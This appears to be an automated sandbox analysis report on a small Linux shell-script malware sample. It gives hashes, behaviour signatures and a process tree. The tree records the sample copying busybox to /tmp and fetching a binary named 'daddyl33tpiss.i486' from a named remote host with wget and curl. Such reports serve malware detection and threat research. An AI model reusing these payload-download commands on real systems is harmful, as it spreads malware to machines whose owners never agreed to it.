Analysis
- max time kernel: 148s
- max time network: 129s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240508-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 15/07/2024, 14:32
Static task: static1
Behavioral task: behavioral1
- Sample: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
- Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral2
- Sample: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
- Resource: debian9-armhf-20240418-en
Behavioral task: behavioral3
- Sample: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
- Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
- Sample: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
- Resource: debian9-mipsel-20240611-en
General
- Target: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
- Size: 2KB
- MD5: 1ffa7d5e3a236cf0d6981d07e1b90406
- SHA1: 9bdae03e2410b108144841c466d1e769fea3a9ce
- SHA256: 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4
- SHA512: 6f2aea4615c2f2cf06fc7dd92d9dd24f8b79d3a89d9fb17a35dcd9170ed12f7b5c238ee64b99dfd19686cdccfca62580a4285cedbad11e4cc39315e0f8bba284
Malware Config
Signatures
- Reads runtime system information (1 IoCs)
  Reads data from /proc virtual filesystem.
  description: File opened for reading; ioc: /proc/filesystems; Process: cp
- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description: File opened for modification; ioc: /tmp/busybox; Process: cp
Processes
- /tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
  Command line: /tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh
  Depth: 1, PID: 1504
  - /bin/cp
    Command line: cp /bin/busybox /tmp/
    Depth: 2, PID: 1505
    - Reads runtime system information
    - Writes file to tmp directory
  - /usr/bin/wget
    Command line: wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
    Depth: 2, PID: 1506
  - /usr/bin/curl
    Command line: curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486
    Depth: 2, PID: 1510
Network
MITRE ATT&CK Matrix
Downloads
- Filesize: 2.0MB
- MD5: b4dede5fc0b1bad5cb8e901bde126b97
- SHA1: 10cbe9a418ad84a1ed297948539d37aeb58dd810
- SHA256: a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
- SHA512: 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6